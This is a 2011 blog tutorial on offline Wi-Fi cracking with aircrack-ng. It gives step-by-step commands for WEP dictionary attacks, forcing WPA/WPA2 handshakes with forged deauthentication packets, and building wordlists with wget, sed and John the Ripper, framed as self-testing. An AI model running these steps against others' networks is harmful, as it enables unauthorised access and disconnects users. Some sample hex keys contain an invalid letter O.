noquest banner



Wi-fi dictionary cracking

In an effort to secure our own wi-fi network, we have to test how easy is to break in.
Brute-force is always a way to do it, especially in offline wi-fi cracking.

We need the right hardware and software so we can accomplish it.
In this article we will use Linux Fedora 14 as operating system and a Realtek 8187L, wi-fi chipset, USB card, model: erzw54-usb04rs800.

Nowadays, WEP 64 bit and 128 bit are easy to decrypt by capturing enough packets (IVs). This can be done by installing a patched kernel driver for the wi-fi card that allows injection.
If we do not want to patch the driver, we will only need to capture 4 WEP data packets for offline brute-force attack.
There are 3 or 4 algorithms for converting our ASCII access point password to hexadecimal codes, that's why we will try with a hexadecimal dictionary on WEP brute-forcing.
To offline crack WPA and WPA2 we need to capture the four way handshake. We will have to capture packets until a user authenticates in the access point (AP). Then, we will send a fake deauthentication request to force the client to reauthenticate using the four way handshake that we will be ready to get.
Data can be then cracked with dictionary attack.

Remember:
For offline brute-force cracking WEP keys we need 4 data packets.
For offline brute-force cracking WPA/WPA2 keys we need the four way handshake.

The first step is to open a console,  become root user and install aircrack-ng software:

su -
yum install aircrack-ng

Check for running processes that could cause trouble:

airmon-ng check

Kill them now:

airmon-ng check kill

We have to know the interface name for the USB wi-fi card we are using, which must be wlan0 or wlan1. wlan0 usually corresponds to the integrated wi-fi card found in notebooks. We have to look for interface names in our system:

iwconfig


Start the wi-fi card in monitor mode:

airmon-ng start wlan1
airodump-ng -w testfile wlan1


airmon-ng

Now wlan1 is set in monitor mode and the virtual interface to use in our job is named mon0.

Wait a few minutes and look for the nearest access points. -30 is a very good power signal strength (PWR). -90 denotes a far away access point which is almost not suitable for cracking.

It is a good idea to take a look at interesting channels and then focus in only one of them. The result will be faster data gathering.

airodump-ng

Example using channel 6.

airmon-ng 6 start wlan1
airodump-ng -c 6 -w testfile wlan1


Note: Some access points use more than one channel at the same time (802.11n), we can use -c 6,7,8 in airodump-ng parameters to cover the adjacent channels.

Try to change the USB card orientation, move the card antenna for better performance in the capture.

airodump-ng

Use Ctrl-C to stop airodump-ng. If we want to change the channel and start again the capture, the same parameter -w testfile could be used and testfile-02 will be created without overwriting the old one.

Aircrack-ng will show our captured work (all testfile*.cap) by typing:

aircrack-ng testfile*.cap

Now we can try to crack with the standard method the WEP key but we will need far over more than IVs to capture. But remember we are trying with the brute-force attack.

Because of a bug in aircrack-ng 1.1 we can not use -e parameter to specify an ESSID for WEP cracking, we have to let the software ask us.

aircrack-ng

We can not know if we are looking for a 64 bit key or 128 bit, so we have to try both.
64 bit WEP is 10 hexadecimal characters or 5 ASCII characters
128 bit WEP is 26 hexadecimal characters or 13 ASCII characters

Let's try with hexadecimal characters dictionary.

aircrack-ng -a 1 -n 64 -w h:hexadecimal64dictionary.txt testfile*.cap

Where:
- a 1 is WEP encryption.
- n 64 is 64 bit.
- w h:hexadecimal64dictionary.txt is the dictionary file to use. Note that it is mandatory when using hexadecimal dictionary attack to type h: in front of the filename.
- testfile*.cap is the captured data file with airodump-ng.

The 64 bit hexadecimal dictionary

Some people prefer easy to remember passwords. ASCII to Hex key conversion is not always right because of the different conversion algorithms. With WEP 64 bit, people mainly use Hex passwords like:

1234567890
ABCDEFABCD
A1B2C3D4E5
DEADBEEF00
DECAFF0000
BADCOFFEE0
BADBADDEAD

In order for the software to understand the parameter -w h:hexadecimald64dictionary.txt, we need to build our own 64 hexadecimal dictionary (in txt format) inserting : every two characters.

12:34:56:78:90
AB:CD:EF:AB:CD
A1:B2:C3:D4:E5
DE:AD:BE:EF:00
DE:CA:FF:00:00
BA:DC:OF:FE:E0
BA:DB:AD:DE:AD

The 128 bit hexadecimal dictionary

In 128 bit WEP encryption people usually prefer to use the access point conversion from ASCII to Hex, that is because it is  hard to remember 26 hexadecimal characters.
Nevertheless, we can build a text file with easy to remember Hex passwords like:

11:22:33:44:55:66:77:88:99:00:AA:BB:CC
AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA
1A:2B:3C:4D:5E:6F:7A:8B:8C:9D:0E:1F:2A
BA:DD:EA:DB:EE:FB:AD:DE:CA:FF:C0:FF:EE

The aircrack-ng command for 128 bit WEP Hex dictionary crack in our example is:

aircrack-ng -a 1 -n 128 -w h:hexadecimal128dictionary.txt testfile*.cap

Obviously, we can try to crack 128 bit WEP with standard words by using the automatic conversion algorithm that aircrack-ng includes but as said earlier it could happen that we tried the correct word but the conversion algorithm is not the correct one.

For cracking WEP 128 bits with a standard word dictionary, type this:

aircrack-ng -a 1 -n 128 -w wordlist.txt testfile*.cap

The file wordlist.txt must contain one word per row followed by enter. Example:

abacinate
abacination
abaciscus
abactinal
abactinally
abaction
abaculus


WPA and WPA2 brute-force cracking

Passphrases can be cracked by brute-force and up to now (2011) this is the only way to do it.

Getting the four way handshake


When airodump-ng is running, under the access point list there's a list of MAC access points and MAC of connected computers.
If we are patient, when a WPA access point have a connected client, we can open a new root console window and send a fake deauthentication packet that will return the four way handshake. In this way, we will be able to run offline the brute-force attack to find the password.

aireplay-ng --deauth 1 -a ACCESSPOINTMAC -c CONECTEDCLIENTMAC mon0

This attack will not be always successful. A possible reason is that there are access points protected against deauthentication attacks or that we are too far way from the device.

We have detected a bug when trying this procedure in Fedora 14. When typing that command the result was:

mon0 is on channel -1, but the AP uses channel 9

It can be solved using the kernel patch, but there is an easy way to solve this, updating the aircrack-ng:

yum update aircrack-ng

However, this does not provide us any newer bug-fixed version. Therefore, the correct solution is uninstalling the Fedora 14 aircrack-ng packet and downloading a newer night-build version.

http://nightly.aircrack-ng.org/aircrack-ng/trunk/

Go to the link above and download the last one. We will need to uninstall the Fedora version and compile the new one, download the gcc compiler and needed libraries.

rpm -e aircrack-ng
yum install gcc openssl
tar -zxvf aircrack-ng-trunk-xxxx-xx-xx-rxxxx.tar.gz
cd aircrack-ng
make
make install


After this, a new version is installed, and we can use the new option --ignore-negative-one

aireplay-ng --deauth 1 -a ACCESSPOINTMAC -c CONECTEDCLIENTMAC mon0 --ignore-negative-one

Now, we can use the aireplay-ng command to get the four way handshake for WPA or WPA2.
Note that we are talking about WPA-PSK and WPA2-PSK (WPA Personal). WPA-EAP (WPA Enterprise) does not use a passphrase, it uses a RADIUS authentication server that is far from the scope of this article.

Once we have the four way handshake, we will see it by running aircrack-ng:

aircrack-ng -w wordlist.txt testfile*.cap

By default aircrack-ng use WPA/WPA2, there is no need for using -a -n parameters.
We will see the ESSID and the WPA handshake in the list, now the hard work is to guess the passphrase.






Wordlists

Good wordlists are a treasure to keep. For a successful attack, testing with only a few hundred words will usually provide poor results. We must try with millions of words, tweak them and try again.

Some suggestions in building your own wordlists:

books and dictionaries

- Try all the 8 digit numbers.

00000000
00000001
00000002
00000003


- Try all the English words found in a dictionary.

- Try the last 100 year dates in different format strings.

01/02/1998
01-02-1998
01021998
01 02 1998


- Try all the English words and then add a year at the end.

computer1999
computer2000
screen1999
screen2000


We can tweak the wordlist with John the Ripper (JTR).

The first step is to build a wordlist for brute-force cracking. This wordlist can be used for WPA and other cracking purposes like password protected files .rar, .zip, and so on.

We can download a file with words from the internet and also we can build our own list from scratch and then merge them.
Searching for wordlists is easy, here is one:

http://www.openwall.com/passwords/wordlists/password.lst


Building powerful wordlists


We can build our own wordlist in some different ways. The simplest way is typing each word in the console:

echo -e "Word1\nWord2\nWord3" > ourwordlist.txt

A better way is getting a .html file with interesting words:

wget http://names.mongabay.com/most_common_surnames.htm

Remove the html tags:

sed -e :a -e 's/<[^>]*>//g;/</N;//ba' most_common_surnames.htm >1.txt

Remove leading and trailing whitespace from each line:

sed 's/^[ \t]*//;s/[ \t]*$//' 1.txt >2.txt

Remove all blank lines:

sed '/^$/d' 2.txt >3.txt

Change space for new line:

tr ' ' '\012' < 3.txt >4.txt

In the next command, we pipeline several commands in one line.
Change all letters to lowercase, change all non alphabetic symbols for newline, sort them all and remove duplicates:

tr '[A-Z]' '[a-z]' < 4.txt | tr -cs '[:alpha:]' '[\n*]' |sort |uniq > 5.txt

The last output file named 5.txt contains all the interesting strings that were in the .html file we downloaded.
It is ready for brute-force dictionary cracking.
Obviously, there will be some rubbish, but we can ignore it.

We can skip all the previous steps and use just the last command for faster but slightly poor wordlist generation.

With this technique we can build very specialized wordlists based on web sites that talk about a subject we are looking for.
We can do it with several websites and join all the files, sort and remove duplicates.

Powerful example to build a specific wordlist

Assume that the password we want to crack is a word related to space travel.
We will download the NASA website and extract all the words to build an updated space travel related wordlist.

NASA ship

wget -A '.html,.htm,.xhtml,.xht,.xml,.asp,.txt,.js,.css,.php' -r --level 2 http://www.nasa.gov

-A is to download only the .html and related text files, we don't want pictures. 
-r means recursive.
--level 2 is to download all: the main page (level 0), the contents of the linked web pages (level 1) and the linked web pages again. This is level 2. Be careful because too much depth will take time to complete.

Downloading recursively a website is not always successful since some websites can not be crawled with wget in recursive mode (-r). This is because wget obeys robots.txt file.

Directory www.nasa.gov will be created.

We will merge all the downloaded hypertext files into a single file. The magic command is:

find . -name "*" -print0 |xargs -0 cat - >mergedfiles.html

Apply the same cleanup that we saw before.

sed -e :a -e 's/<[^>]*>//g;/</N;//ba' mergedfiles.html >1.txt
sed 's/^[ \t]*//;s/[ \t]*$//' 1.txt >2.txt
sed '/^$/d' 2.txt >3.txt
tr ' ' '\012' < 3.txt >4.txt
tr '[A-Z]' '[a-z]' < 4.txt | tr -cs '[:alpha:]' '[\n*]' |sort |uniq > 5.txt

The file 5.txt is our new crafted space travel wordlist.

Let's tweak it a bit.
Almost everybody should know that using a password that is only a word that can be found in a dictionary or in a website is not a good idea. For example,  by adding a number will make it far more difficult to be cracked.

But there is John the Ripper that knows this type of method and will crack the passwords anyway.

John the Ripper (JTR) is an application that modifies all the words in our wordlist file and improves the chances of a successful crack.

yum install john

john --rules --wordlist=5.txt --stdout >6.txt

With the standard --rules option JTR keeps the original words in the file. It also adds the same words with the first letter in uppercase, an s at the end of the words, numbers at the beginning and at the end, removes vowels, reverses the words, and more tweaks.

Example output --rules in John the Ripper with the word: noquest

noquest
Noquest
noquests
noquest1
Noquest1
tseuqon
1noquest
NOQUEST
noquest2
noquest!

noquest3
noquest7
noquest9
noquest5
noquest4
noquest8
noquest6
noquest0
noquest.
noquest?

nqst
tseuqoN
Tseuqon
noquesT
2noquest
4noquest
Noquest2
Noquest!
Noquest3
Noquest9

Noquest5
Noquest7
Noquest4
Noquest6
Noquest8
Noquest.
Noquest?
Noquest0
3noquest
7noquest

9noquest
5noquest
6noquest
8noquest
Noquests
noquested
noquesting
Noquested
Noquesting


There are 48 combinations of the word noquest. This is going to take 48 more times, 48x more disk space in our cracking effort.

But remember, more words, greater success.

With our wordlist ready. Now it is crack time!

aircrack-ng -w 6.txt testfile*.cap

Good luck!



September 2011.

Use main page comments for questions.


Tweet
Copyright NoQuest.com Contact NoQuest.com